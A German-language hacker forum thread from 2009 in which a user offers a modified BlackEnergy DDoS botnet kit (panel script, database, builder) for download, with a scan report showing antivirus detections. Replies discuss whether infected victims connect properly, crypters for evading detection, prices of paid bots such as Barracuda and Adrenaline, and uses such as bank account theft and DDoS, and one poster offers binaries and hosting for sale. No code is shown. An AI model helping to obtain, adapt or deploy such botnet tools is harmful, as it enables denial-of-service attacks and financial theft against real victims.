Autor Thema: [B] Blackenergy v1.92 Style v2 by 60t0t  (Gelesen 888 mal)

0 Mitglieder und 1 Gast betrachten dieses Thema.

60t0t

  • Newbie
  • *
  • Beiträge: 20
  • Karma: 10
    • Profil anzeigen
[B] Blackenergy v1.92 Style v2 by 60t0t
« am: März 06, 2009, 03:53:33 Nachmittag »
hier mal mein bearbeiteter Blackenergy v1.92 bot


user online zahl ermitteln gefixx
die index gefixx kein Fehler mehr beim absenden

im rar
Script
Blackenergy Style v2
.sql
Blackenergy Style v2
.png
Blackenergy Style v2 Login
.png
BlackEnergy 1.9.2
.exe
lesen
.txt





http
://anubis.iseclab.org/?action=result&task_id=193a337fec513d554b523f6ba139e897c&format=html
File Info

Report generated: 6.3.2009 at 15.56.45 (GMT 1)
Filename: BlackEnergy1.9.2.exe
File size: 76 KB
MD5 Hash: D4483F3368EC0444A55FDFC2B09C2649
SHA1 Hash: DAB280905AC2281C4B49A333E6AE1EE84153777B
Packer detected: Microsoft Visual C++ 7.0
Self-Extract Archive: Nothing found
Binder Detector:  File is possible binded with malware
Detection rate: 20 on 24

Detections

a-squared - Constructor.Win32.DDoS.a!IK
Avira AntiVir - WORM/Rbot.Gen
Avast - Win32:Small-JGP [Trj]
AVG - DoS.QZ
BitDefender - Trojan.Generic.24959
ClamAV - Trojan.Downloader-11579
Comodo - Backdoor.Win32.Agent.NGC      
Dr.Web - Trojan.DownLoader.26661
Ewido - Not-A-Virus.DoS.Win32.BlackEnergy.a
F-PROT 6 - W32/Trojan.CDRQ
G DATA - DoS.Win32.BlackEnergy.a    A
IkarusT3 - Constructor.Win32.DDoS.a
Kaspersky - DoS.Win32.BlackEnergy.a
McAfee - FDoS-BEnergy trojan  
MHR (Malware Hash Registry) - Virus Found - detect rate 89%
NOD32 v3 - Win32/Agent.NGC  
Norman - Trojan W32/Smalltroj.CRBQ
Panda - Nothing found!
Quick Heal - DoS.BlackEnergy.a (Not a Virus
Solo Antivirus - Nothing found!
Sophos - Nothing found!
TrendMicro - Nothing found!
VBA32 - DoS.Win32.BlackEnergy.a    
Virus Buster - DoS.BlackEnergy.E

Scan report generated by  
NoVirusThanks.org



Pw: SceneCoderZ.com Dl: Blackenergy v1.92 Style v2 by 60t0t
« Letzte Änderung: März 06, 2009, 03:59:57 Nachmittag von 60t0t »

whit3

  • Sr. Member
  • ****
  • Beiträge: 324
  • Karma: 10
    • Profil anzeigen
    • http://someload.x02.us/
[B] Blackenergy v1.92 Style v2 by 60t0t
« Antwort #1 am: März 06, 2009, 04:10:14 Nachmittag »
Der bot funkt doch ncith richtig oder?
Die "Szene" schon seit geburt an herzkrank und über die Jahre bilden sich immer mehr

60t0t

  • Newbie
  • *
  • Beiträge: 20
  • Karma: 10
    • Profil anzeigen
[B] Blackenergy v1.92 Style v2 by 60t0t
« Antwort #2 am: März 06, 2009, 04:12:11 Nachmittag »
was ist bei euch der funkt nicht richtig ??
« Letzte Änderung: März 06, 2009, 04:16:07 Nachmittag von 60t0t »

SareD

  • Newbie
  • *
  • Beiträge: 1
  • Karma: 10
    • Profil anzeigen
[B] Blackenergy v1.92 Style v2 by 60t0t
« Antwort #3 am: März 06, 2009, 05:19:50 Nachmittag »
Hatte mal ne Zeitlang den Fehler das Vics nicht richtig connected haben.

60t0t

  • Newbie
  • *
  • Beiträge: 20
  • Karma: 10
    • Profil anzeigen
[B] Blackenergy v1.92 Style v2 by 60t0t
« Antwort #4 am: März 06, 2009, 05:41:23 Nachmittag »
also das leuft alles bestens es ist zwar so das wenn man mal seite refresht das nicht alle bots angezeigt werden aber wenn man wieder refresht sind dann mal paar mehr on und mal paar weniger aber sonst leuft alles mit manchen crypter geht der bot dann auch bei vista ;)

Epiphone

  • Jr. Member
  • **
  • Beiträge: 52
  • Karma: 0
    • Profil anzeigen
[B] Blackenergy v1.92 Style v2 by 60t0t
« Antwort #5 am: März 06, 2009, 06:09:31 Nachmittag »
Der Bot ist Müll!
Wenn ihr umbedingt einen Webpannel Bot verwenden wollt, dann nehmt den Illusion Bot!
Ist relativ Stable & hat einen sehr guten DDoS!

60t0t

  • Newbie
  • *
  • Beiträge: 20
  • Karma: 10
    • Profil anzeigen
[B] Blackenergy v1.92 Style v2 by 60t0t
« Antwort #6 am: März 06, 2009, 06:15:49 Nachmittag »
was ist an den bot nicht Stable ? nur weil er nicht immer alle bots anzeigt die online sind wenn man refresht drückt?

Chronos

  • Newbie
  • *
  • Beiträge: 21
  • Karma: 10
    • Profil anzeigen
[B] Blackenergy v1.92 Style v2 by 60t0t
« Antwort #7 am: März 06, 2009, 06:44:29 Nachmittag »
Public Bots sind generell scheisse ausser man kann coden und kann sie selbst modden au

60t0t

  • Newbie
  • *
  • Beiträge: 20
  • Karma: 10
    • Profil anzeigen
[B] Blackenergy v1.92 Style v2 by 60t0t
« Antwort #8 am: März 06, 2009, 06:56:37 Nachmittag »
kannst ja mal den barracudas posten

xWantedx

  • Newbie
  • *
  • Beiträge: 25
  • Karma: 10
    • Profil anzeigen
[B] Blackenergy v1.92 Style v2 by 60t0t
« Antwort #9 am: März 06, 2009, 07:21:09 Nachmittag »
Zur Info: der Barracuda kostet 900Euro. weis gerade nicht, ob DDoS Modul schon dazu gerechnet ist. Socks5 und PW grabber kosten auch extra.
Adrenaline um die 4000$.

60t0t

  • Newbie
  • *
  • Beiträge: 20
  • Karma: 10
    • Profil anzeigen
[B] Blackenergy v1.92 Style v2 by 60t0t
« Antwort #10 am: März 06, 2009, 07:23:19 Nachmittag »
jo hat er aber nicht dazu geschrieben das der barracudas was kostet

Pokerface

  • Newbie
  • *
  • Beiträge: 1
  • Karma: 10
    • Profil anzeigen
[B] Blackenergy v1.92 Style v2 by 60t0t
« Antwort #11 am: März 06, 2009, 07:26:54 Nachmittag »
was bring so ein bot ?

60t0t

  • Newbie
  • *
  • Beiträge: 20
  • Karma: 10
    • Profil anzeigen
[B] Blackenergy v1.92 Style v2 by 60t0t
« Antwort #12 am: März 06, 2009, 07:28:36 Nachmittag »

CorVu5

  • Newbie
  • *
  • Beiträge: 32
  • Karma: 10
    • Profil anzeigen
[B] Blackenergy v1.92 Style v2 by 60t0t
« Antwort #13 am: März 06, 2009, 08:00:47 Nachmittag »
Informationsdiebstahl (vor allem Bankaccounts),
DoS,
Hitfaking
und noch viele tolle Sachen mehr :D

//edit
Da wir gerade davon sprechen, hat hier jemand ne leere seite mit nem Hitcounter drauf, die sonst nie besucht wird?
Würde das gerne testen

Chronos

  • Newbie
  • *
  • Beiträge: 21
  • Karma: 10
    • Profil anzeigen
[B] Blackenergy v1.92 Style v2 by 60t0t
« Antwort #14 am: März 06, 2009, 08:19:52 Nachmittag »
Also barracudas bisher 500 euro ddosmodul soweit ich weis bzw ihc bekomme für das geld und adrenaline kanni ch euch binary besorgen wenn ihr wollt aber ihr müsst halt das geld parat haben hosten könnt ihr auch bei mir wenn ihr wollt näheres per pn werde demnächst mal paar topics lffnen